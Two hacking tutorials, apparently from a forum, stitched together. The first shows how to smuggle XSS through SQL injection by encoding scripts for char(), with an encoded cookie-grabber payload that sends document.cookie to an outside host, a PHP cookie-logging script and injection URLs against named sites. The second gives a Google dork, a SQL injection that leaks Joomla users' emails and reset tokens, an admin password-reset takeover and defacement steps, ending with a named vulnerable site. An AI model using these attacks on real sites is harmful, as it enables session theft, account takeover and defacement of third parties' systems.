XFS - XSS From SQL

XFS - XSS From SQL

[------------------------------------------------------------------------]

[+] Summary

[1] Presentation

[2] Explanation

[3] Demonstration

[------------------------------------------------------------------------]

[1] --[Presentation]--

XFS is a SQL deviation who lets return javascript code by through of the 

function char().

This function convert an ASCII code to char, this why we'll 

use it to execute javascript code.

The XFS can give you a restricted XSS 

possibility and obviously the SQL vulnerabilty.

So for XFS we need :

- String to ASCII converter

- The function char()

In the next parties you will see the conditions for do it, how it work 

and demonstration.

[2] --[Explanation]--

To use it, you need to convert your string in ASCII 

(Online Converter : http://www.easycalculation.com/ascii-hex.php).

Char() will read the ASCII code and return it, so if you insert 

the ASCII javascript code, char() will return you the 

javascript code and it will be executed BUT when you encode your javascript 

code, this codemustn't have any space, so the XSS is restricted

but you can grab, alert and a lot of other XSS thing.

Example :

If you want convert your javascript code to ASCII, for work, the javascript 

code mustn't to be like it :

<script > alert(document.cookie) </script> <= You need to delete space :

<script>alert(document.cookie)</script> <= Its okay, you can convert it in ASCII

When the code will be convert in ASCII, you will get a thing like it :

46 65 42 12 85 68 ...

But before put it in char(ASCII), we need to replace space by "," like it :

46,65,42,12,85,68 ... <= Its okay for put in char()

[3] --[Demonstration]--

Vuln website :

- http://landfill.elvinbts.org/show_ac...II_CODE),7,8--

Some javascript codes without space :

Alert :

################################

#

#- String : <SCRIPT>alert('xss')</script>

#

#- ASCII : 60 83 67 82 73 80 84 62 97 108 101 114 116 40 39 120 115 115 39 #41 60 

47 115 99 114 105 112 116 62 

#

################################

Cookie Grabber :

################################

#

#- String : 

<SCRIPT>location.href='http://www.yoursite.com/cookie.php?#cookie='

+escape(document.cookie)</SCRIPT>

#

#- ASCII : 60 83 67 82 73 80 84 62 108 111 99 97 116 105 111 

110 46 104 114 101 102 61 39 104 116 116 112 58 47 47 119 

119 119 46 121 111 117 114 115 105 116 101 46 99 111 109 

47 99 111 111 107 105 101 46 112 104 112 63 99 111 111 107

 105 101 61 39 43 101 115 99 97 112 101 40 100 111 99 117 

109 101 110 116 46 99 111 111 107 105 101 41 60 47 83 67 

82 73 80 84 62 

#

################################

Cookie Grabber file :

################################

#

# <?php

#

#

$cookies = $_GET["cookie"];

#

# if($cookies)

# {

#

# $grab = fopen("grab.txt","a");

# fputs($grab, $cookies . "\r\n");

# fclose($grab);

#

# }

#

# ?>

#

################################

So before insert your ASCII in char(), you must replace 

(in the ASCII code) all space by ",".

Example :

################################

# 45 52 86 23 54 ...

# To :

# 45,52,86,23,54 ...

################################

So lets go :

Alert :

http://landfill.elvinbts.org/show_ac...,116,62),7,8--

You can see a textbox is executed with the text : "XSS" => it's the XSS alert

Sqli Without Tools

Hi,

this is a tutorial based on other tutorial on HF but a little bit different, no sql tool used.

1/ Finding Exploit And Target

Google dork: inurl:"option=com_mytube"

Type that Dork in Google.


2/ Inject Target

Find a url like this:

Code:

http://site.com/index.php?option=com_mytube&Itemid=88..

Now replace the url like this:

Click here to view: http://pastebin.com/ZxxU8Nsr

If the site is vulnerable, you can see something like this:

We can see username, email and activation code. (username:email:activation code)

Now, let this page open and open a new page.

3/ Admin password reset

Go to:

Code:

http://www.site.com/index.php?option=com_user&view=reset

This is standard Joomla! query for password reset request

Type the email adress found in step 2 and press Submit.

The activation code should be resetted.

Return to the first page, refresh the page and take the new activation code.

Paste him in the token and press Submit.

problem with token.. :((

UPDATE: Joomla! 1.5.16 now hashes the reset token

if you see a thing like :$1$14411: after the activation code, it will not work

4/ Admin Login

If you done everything ok, your Password page will load. Enter your new password...

After that go to:

Code:

http://www.site.com/administrator/

Standard Joomla portal content management system

Enter the username (found in step 2) and your new password, click on Login
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!

[color=#FF0000]Vuln. site compatible with this tutorial: 

Code:

http://www.mirditaturistike.com/index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62

---